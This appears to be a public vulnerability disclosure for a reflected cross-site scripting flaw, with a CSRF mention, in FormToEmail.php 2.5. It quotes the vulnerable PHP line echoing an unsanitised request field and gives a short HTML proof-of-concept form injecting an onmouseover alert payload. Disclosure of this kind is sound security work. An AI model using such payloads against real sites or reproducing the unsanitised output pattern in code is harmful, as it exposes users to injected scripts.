* Exploit Title: Reflective XSS
* Discovery Date: 02/09/2016
* Public Disclosure Date:03/10/2016
* Exploit Author: CJ Chamberland
* Contact: @cjchamberland - http://cjchamberland.com
* Vendor Homepage: formtoemail.com
* Software Link: formtoemail.com (formtoemail.php free is available for download from this site)
* Version: 2.5
* Tested on: apache/mac os
* Category: webapps
* Ident: OVE-20160305-2496
Description
================================================================================
Form accepts and processes un-sanitized input from forms, it is also susceptible to CSRF:
Line 234: Thank you <?php if(isset($_REQUEST['name'])){print stripslashes($_REQUEST['name']);} ?>
PoC
================================================================================
<form method=post action="FormToEmail.php">
<input type=text name="name" value="<div onmouseover=alert(0);>Bob</div>">
<input type=submit>
</form>